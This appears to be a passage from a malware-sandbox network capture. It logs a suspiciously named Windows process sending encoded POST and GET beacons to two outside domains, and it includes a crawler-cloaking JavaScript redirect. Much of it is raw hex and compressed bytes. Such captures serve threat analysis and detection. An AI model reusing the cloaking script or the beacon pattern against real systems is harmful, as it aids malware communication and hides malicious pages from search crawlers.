                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.11.3049914134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:46.219477892 CEST773OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 30 74 34 64 32 44 31 63 78 6e 58 6b 75 7a 69 64 61 4b 48 77 38 74 44 42 64 32 6b 37 71 7a 4e 75 61 67 4d 59 57 6b 4c 45 37 6c 61 45 48 48 66 50 75 74 7a 6d 70 47 36 53 76 6a 6c 38 44 6d 71 45 55 2b 44 6d 54 69 68 55 77 35 72 4c 76 39 66 4d 42 4c 54 52 74 74 6d 43 61 74 4d 63 31 6b 72 49 7a 68 51 4f 4b 34 68 7a 64 49 6e 51 4a 37 34 74 31 31 63 78 59 30 52 58 70 32 2b 47 59 79 71 4f 46 75 4c 6e 56 4f 37 5a 66 2b 51 42 74 2b 6a 51 31 49 38 36 46 33 41 2f 65 52 42 53 6b 44 34 35 65 4d 37 70 2f 6f 53 70 75 64 50 67 34 31 39 4e 33 76 4d 34 2f 41 3d 3d
                                              Data Ascii: 7LY=/hCTf0qw35oq0t4d2D1cxnXkuzidaKHw8tDBd2k7qzNuagMYWkLE7laEHHfPutzmpG6Svjl8DmqEU+DmTihUw5rLv9fMBLTRttmCatMc1krIzhQOK4hzdInQJ74t11cxY0RXp2+GYyqOFuLnVO7Zf+QBt+jQ1I86F3A/eRBSkD45eM7p/oSpudPg419N3vM4/A==
                                              Sep 24, 2024 11:27:46.412291050 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:46 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.11.3049915134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:48.955847979 CEST793OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 32 4f 67 64 77 56 39 63 32 48 57 57 6c 54 69 64 51 71 48 30 38 74 2f 42 64 33 51 72 72 42 35 75 61 42 38 59 52 56 4c 45 34 6c 61 45 4d 6e 66 4f 67 4e 7a 74 70 47 6d 77 76 68 78 38 44 6d 75 45 55 2b 7a 6d 54 52 59 43 78 70 72 4a 6a 64 66 43 50 72 54 52 74 74 6d 43 61 74 59 36 31 6e 62 49 30 52 4d 4f 4c 64 56 79 44 59 6e 54 4d 4c 34 74 6b 6c 63 31 59 30 52 6c 70 79 66 54 59 77 53 4f 46 76 37 6e 56 2f 37 61 57 2b 51 48 6a 65 69 7a 6a 4c 68 78 45 54 38 39 59 77 68 31 73 67 35 41 66 62 4b 7a 69 72 6d 72 39 39 7a 4e 6b 30 51 6c 31 74 4e 6a 69 4b 33 34 78 4d 5a 4d 33 51 4d 63 72 42 4a 63 4a 35 65 5a 6c 41 41 3d
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrB5uaB8YRVLE4laEMnfOgNztpGmwvhx8DmuEU+zmTRYCxprJjdfCPrTRttmCatY61nbI0RMOLdVyDYnTML4tklc1Y0RlpyfTYwSOFv7nV/7aW+QHjeizjLhxET89Ywh1sg5AfbKzirmr99zNk0Ql1tNjiK34xMZM3QMcrBJcJ5eZlAA=
                                              Sep 24, 2024 11:27:49.152493000 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:49 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.11.3049916134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:51.692873001 CEST2578OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 32 4f 67 64 77 56 39 63 32 48 57 57 6c 54 69 64 51 71 48 30 38 74 2f 42 64 33 51 72 72 42 42 75 64 7a 59 59 53 79 33 45 35 6c 61 45 46 48 66 44 67 4e 7a 77 70 47 2b 30 76 68 39 47 44 6b 47 45 46 74 4c 6d 62 45 30 43 2b 70 72 4a 74 4e 66 50 42 4c 54 49 74 74 32 47 61 74 49 36 31 6e 62 49 30 51 38 4f 4d 49 68 79 45 6f 6e 51 4a 37 34 78 31 31 63 52 59 30 5a 66 70 79 61 6f 59 32 4f 4f 5a 4d 44 6e 56 74 54 61 57 2b 51 48 6b 65 69 2b 6a 4c 74 30 45 56 55 70 59 78 59 41 72 54 31 41 66 2f 4f 76 2b 71 57 54 6f 4c 2f 62 34 56 67 74 36 74 46 39 69 74 7a 62 34 63 4a 50 67 79 63 4a 7a 45 4e 6e 65 37 75 64 2b 56 61 44 49 30 55 42 31 34 6d 74 7a 47 47 33 37 4f 68 56 58 4d 75 74 39 31 56 63 4d 30 75 6e 75 37 74 4f 62 6c 31 69 79 4f 45 6d 5a 5a 4a 4f 31 72 61 64 4e 6c 6d 33 67 79 72 61 53 5a 38 77 36 69 75 30 79 4a 6b 75 6d 31 6b 2f 64 74 65 70 55 66 32 52 59 4b 48 4a 6b 69 78 47 31 73 34 56 6e 4d 51 45 37 76 56 50 74 6f 37 4b 55 75 51 4b 35 74 77 67 78 7a 42 49 38 50 [TRUNCATED]
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrBBudzYYSy3E5laEFHfDgNzwpG+0vh9GDkGEFtLmbE0C+prJtNfPBLTItt2GatI61nbI0Q8OMIhyEonQJ74x11cRY0ZfpyaoY2OOZMDnVtTaW+QHkei+jLt0EVUpYxYArT1Af/Ov+qWToL/b4Vgt6tF9itzb4cJPgycJzENne7ud+VaDI0UB14mtzGG37OhVXMut91VcM0unu7tObl1iyOEmZZJO1radNlm3gyraSZ8w6iu0yJkum1k/dtepUf2RYKHJkixG1s4VnMQE7vVPto7KUuQK5twgxzBI8Pqv9PFKaodQZlUjUuenI5dqZlbp2urH83Qc1rxNj7gbyJRbrw/xXVAofy6HZZRRgwODvbECD0W0E4l/7HnMPaUY4wyNWNj5Y+HznSWg+dSopzVkbyPXnJ+3rvywrDaMuBMMYNTFgEbmhtFH4wsuMwsZrwWBMUXj3F4XNSVSXWGJEOT10eIpJS9nOHK81uBx/ed3Kkc9NQg7uaUkkOisfYybCjh8vnZlbiuMYi9F7sSJLtSs7VzjyBj2gd4v2qFSdwZ/8JU8ppHWDg9uK7IpIDea8hetwGF7CImI8/0bEbxyYBqRV+9uNk9MAmbnepR6neMKO/1lZVW4vzyKIIFHbDodMDX2Tlkjs0XEJ2/H/E1eOP68tDkvN60BQzKc5qoLV5Ve/g7Yk3sTU31j4BKD/risx2d8pPFbAfnliYZ8p0dPdtaS+prRm4R0gAcFwzn51ntQr6lJba5Qtf6v2crTN3uX+nfXGLkbmHEErve/R3TZvSzhFi10jXj4TwTAhOkU6AbTy9krnfhBZhJEvbdwiD1X4ZVXcogmKcGOP0w8HEFSzFghLLFISsqPXPemhiL8nfxpUKRw3Cu347loDe0MVG9cpCMZyDCNHfP1r0hcnyGp3gaXnPcAmhB8oJ8q0TAmi0Dd9ypNss37GtNYOWx4mnmslarHwAJtv+QC [TRUNCATED]
                                              Sep 24, 2024 11:27:51.692890882 CEST1332OUTData Raw: 37 46 46 50 6c 51 32 33 45 61 68 77 58 65 36 75 6e 38 4a 78 76 66 67 68 37 74 6b 38 6c 51 73 72 6b 4c 77 74 45 74 4e 71 74 50 51 45 78 69 54 54 4d 4d 39 54 2b 39 67 6d 4b 32 64 2b 53 72 47 4b 57 58 51 48 58 44 4c 6c 74 74 59 61 30 65 69 49 59 33
                                              Data Ascii: 7FFPlQ23EahwXe6un8Jxvfgh7tk8lQsrkLwtEtNqtPQExiTTMM9T+9gmK2d+SrGKWXQHXDLlttYa0eiIY3qSMdlo96GY+/EWkkqJAI8A1OzMvve/UPqP5zZJt+QL/dklwmJQxNZNFt7QJGDzND9zzXN/Ik5I9PAIfwstIfBtIguM+WOGuTsXw8wQA8htBdvmNj2ETp7X9pcchAmBS25gViQU3PhMyobOeZoKEWFMlmZbxWgmJxS
                                              Sep 24, 2024 11:27:51.886337042 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.11.3049917134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:54.416455984 CEST496OUTGET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:54.609673023 CEST382INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:54 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 196
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.11.3049918221.121.144.149804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:09.547265053 CEST782OUTPOST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 6d 5a 52 4e 49 63 6d 59 55 39 6f 50 7a 57 51 51 52 71 59 70 59 56 36 6b 71 6e 39 79 34 38 78 79 43 46 56 6d 64 57 64 4d 42 71 5a 62 58 4e 4a 61 72 4b 30 72 53 5a 74 36 33 33 65 44 66 4c 62 53 6b 59 4d 57 6b 4e 2f 32 43 79 50 76 6c 73 79 38 79 44 7a 4b 6e 55 68 6a 36 47 4b 62 72 47 67 42 75 30 61 50 33 7a 6f 65 61 67 6b 64 2b 72 78 53 77 75 64 4c 38 67 79 71 32 4a 7a 33 2b 59 35 4d 52 46 59 32 64 4c 75 6f 2b 57 56 66 73 45 6b 78 46 51 56 56 61 37 4f 69 61 4c 2b 77 61 6e 32 46 5a 75 67 41 4b 53 46 74 34 52 66 35 2f 51 4b 4e 50 6a 31 43 73 44 49 2b 5a 53 77 6d 30 6c 6d 45 67 3d 3d
                                              Data Ascii: 7LY=ymZRNIcmYU9oPzWQQRqYpYV6kqn9y48xyCFVmdWdMBqZbXNJarK0rSZt633eDfLbSkYMWkN/2CyPvlsy8yDzKnUhj6GKbrGgBu0aP3zoeagkd+rxSwudL8gyq2Jz3+Y5MRFY2dLuo+WVfsEkxFQVVa7OiaL+wan2FZugAKSFt4Rf5/QKNPj1CsDI+ZSwm0lmEg==
                                              Sep 24, 2024 11:28:10.588365078 CEST1289INHTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:10 GMT
                                              server: LiteSpeed
                                              Data Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 [TRUNCATED]
                                              Data Ascii: 5858"*{?)Z=4R?Xi}*w6!)q{u |S[[d[Inq;\Dd%}ehIg\|d|t7U04A0p:\)n-}Dq. 9uqDdlcV/u%Rh2_BC(&Fcu5h4`gUoO$N.1^&q-}",>z>Eo27oFWh]W|CZu1+!4<cu?No`ux_#{+6p|w_B/;.2cP S!<:CX-Pzx#~Q~0;[sYjq2w_XEl{PaHak\}}"W>c|T`G0$C)>L?x#&$^7qmq.=Ffvux~MIH2zg"!IvU6gHv68cPBSOrW(~ed&j~S"Ra$w"disNQ]O'}#$TaIX(OBmXRYE3SWb_|>zN[6"juz82_|Z
                                              Sep 24, 2024 11:28:10.588391066 CEST1289INData Raw: 96 65 b6 15 b2 d8 64 e2 72 2c c7 48 a2 ea eb f1 e7 24 c0 1a 2f 4c 2a b9 e5 24 39 51 e8 ed 93 4a 6e b6 24 a9 95 d4 03 e3 27 66 92 e4 38 85 a0 7b 59 35 6f 9e 5f e6 df ae 54 aa 79 30 bb d5 2b c3 5a 30 43 b9 e8 cd 1b 07 70 d9 53 63 03 bd 0b 06 33 b1
                                              Data Ascii: edr,H$/L*$9QJn$'f8{Y5o_Ty0+Z0CpSc3>?yOu69Tv{$fJ2m8Le~t}62.RR3wom`SrR%9WY5y|^!^=D8Wky[UB/@'It?c&\O8
                                              Sep 24, 2024 11:28:10.588402987 CEST1289INData Raw: 67 b4 8a c1 7d 5d 57 8a a0 2d 60 aa 74 57 fb 1a 5f f6 f8 35 ea 61 89 bd f5 de 87 2c 7d 7c c4 d1 20 2a 7d fd 6f f7 fb f8 f8 b8 8c 25 14 78 90 3d 8c 85 ff e4 e9 8e 0a 11 27 12 67 f9 2d d4 cb d3 1a d5 11 cb 7e fa db 5f fe 89 aa b9 ef df 0a 62 d9 dd
                                              Data Ascii: g}]W-`tW_5a,}| *}o%x='g-~_b!y+?*cN~w|b>VG|`'2LeJZ}wSV^]\Bn8Y>oSGi:\:>PHGSnmpw@7'Wt2:Z@\{w|BVu^[jlV
                                              Sep 24, 2024 11:28:10.588561058 CEST1289INData Raw: 87 53 a9 f8 67 c1 0c 26 05 15 60 7d 1d a6 3d 1a 4d 33 b5 fd 19 05 36 a0 38 8a 9f 1a 20 91 a7 ef 4d 53 55 c7 86 08 e3 fd 3c 70 be 27 d8 66 34 9a 46 66 ca d3 0d 7e f8 16 74 d4 ce 56 ca 18 e0 4c 06 e1 73 c9 fa 32 47 d1 17 ba 31 1a 6d d1 9a 63 f3 07
                                              Data Ascii: Sg&`}=M368 MSU<p'f4Ff~tVLs2G1mcO$#4Y`jgT]qSk7{wLrYuZ^,M(Du9^`>M#uc0Pox]g!k]^/;sInkvh:,tc
                                              Sep 24, 2024 11:28:10.588681936 CEST1289INData Raw: 8e c1 a0 f4 03 72 b1 3f a8 c1 f0 1a 5d 93 45 ca 35 4e 5f 5a 0c 13 bb 45 c7 6c c0 dc 26 2e bc a9 0a 38 f5 8e 02 57 68 f7 b8 95 82 6d 87 5b 3a 2d 36 ea 15 ad 98 e6 84 f8 54 16 c9 c7 f8 d4 0c 0b f8 2e ba b0 b0 39 b1 30 30 65 74 67 57 9b da 9a 16 f9
                                              Data Ascii: r?]E5N_ZEl&.8Whm[:-6T.900etgWnkU4MWU=gA4w+f0J/~(V{=f^|$+>Ha9,!&8wky>pIl?3!1;Z@9&U<HyLV6*+h:-Mn|!T
                                              Sep 24, 2024 11:28:10.588697910 CEST1289INData Raw: 41 30 87 7c f2 73 9e 17 b4 d7 f7 6b df 36 ef 6a f1 35 d8 94 e8 2e a2 80 c0 dc 75 28 b3 54 c1 12 6f 24 b9 34 44 0e 16 2e e4 8a 98 d8 d7 51 e7 40 4b ce c2 59 a6 8e 76 e8 27 78 45 6d 3b 38 8b f3 74 82 86 48 63 52 0d 4d 27 d3 9b b0 46 42 6e 4d b6 1e
                                              Data Ascii: A0|sk6j5.u(To$4D.Q@KYv'xEm;8tHcRM'FBnMFiDJ$ ])/DJ8wUFtigZm09{*UpF7BbB>Uat@p2~D*p4,FqRD*A#!X;$<?# W sib+j*BL[cJ#1
                                              Sep 24, 2024 11:28:10.588715076 CEST1289INData Raw: c0 09 32 99 2d a6 a0 32 50 6a 11 73 4e 4b 15 da 30 ef 2e c0 4a 1e 6b e8 de 5f 68 63 15 5c 06 96 f3 2f e5 d5 ab a1 82 ab 57 c3 2e 9a 5d 01 9b c1 76 d1 ff 2c 09 65 ab 7a d8 30 1a f3 cb e8 a2 13 10 04 83 6e 02 e3 f5 25 6b 9f b6 cb dc 5e 55 6f f6 7a
                                              Data Ascii: 2-2PjsNK0.Jk_hc\/W.]v,ez0n%k^Uoz{EA{4VpFen+.K`v(1D3&GAj^]L5K\D6,NNS'`qf7L4s_=tFJvL^V}o3aq
                                              Sep 24, 2024 11:28:10.588726997 CEST1289INData Raw: 7f d6 77 25 e8 6e 92 a7 41 10 5b d1 49 68 1a 17 c0 77 2f 4b e1 00 d5 7f 12 d5 60 4b ae 32 84 b4 bb d5 bc 2c 7a e0 02 65 68 48 2b 12 2b c2 e4 c4 94 0f f9 00 1b 3e dc 88 d3 2b 25 c5 26 0a f8 e5 67 cf 55 4a 9c eb 83 db 65 f6 db 4b f6 62 75 e5 93 d1
                                              Data Ascii: w%nA[Ihw/K`K2,zehH++>+%&gUJeKbur3L8#V!Z</@}curEyZ}2jeHJK2rW9$%Hg\)J%BH?(Ys$r&>Df6l!=YKrAFG+*pkj^7-xHqY
                                              Sep 24, 2024 11:28:10.588819027 CEST1289INData Raw: 89 98 09 55 23 9a 67 29 0d 3c 5a 67 3a d7 09 41 51 0a e6 18 f3 70 bb 78 52 42 8b 9c a4 9d 3a 60 55 ed 67 05 ef ae f6 df 59 b4 e8 a6 43 fd 95 c5 29 99 25 f8 0e a0 92 e2 2f a3 32 79 87 53 74 bc 31 9c f7 a7 36 2a 0b 3f de e1 4b 90 44 b4 1e a6 2e d7
